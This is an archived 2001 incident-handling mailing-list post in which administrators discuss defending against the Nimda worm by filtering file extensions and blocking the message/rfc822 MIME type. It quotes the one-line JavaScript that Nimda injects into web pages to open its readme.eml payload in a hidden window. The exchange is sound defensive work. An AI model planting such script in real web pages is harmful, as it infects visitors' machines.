Enable your HTTP inbound filter and allow only the extensions you need ppl from the outside to see on your inside net. Because of this we didn't get hit by Code Red or any of it's kind. Right now we're also blocking .eml files outbound to protect our clients on the inside. Regards Henrik Pedersen Cautela A/S Denmark ----- Original Message ----- From: "Rob Quinn" <rquinnat_private> To: "Jim Olsen" <jimat_private> Cc: <incidentsat_private> Sent: Wednesday, September 19, 2001 7:25 AM Subject: MIME type of readme.eml (was Re: New "concept" virus/worm? > > - add this string to the web pages found on the server: > > <html><script language="JavaScript">window.open("readme.eml", null, > > "resizable=no,top=6000,left=6000")</script></html> > > My Raptor firewall and WGET to one sample site show this as MIME type > "message/rfc822". Does this seem to be universal? If I block just that type, > will it be enough to stop nimda hitting IE users? > > ---------------------------------------------------------------------------- > This list is provided by the SecurityFocus ARIS analyzer service. > For more information on this free incident handling, management > and tracking system please see: http://aris.securityfocus.com > > ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Wed Sep 19 2001 - 08:23:21 PDT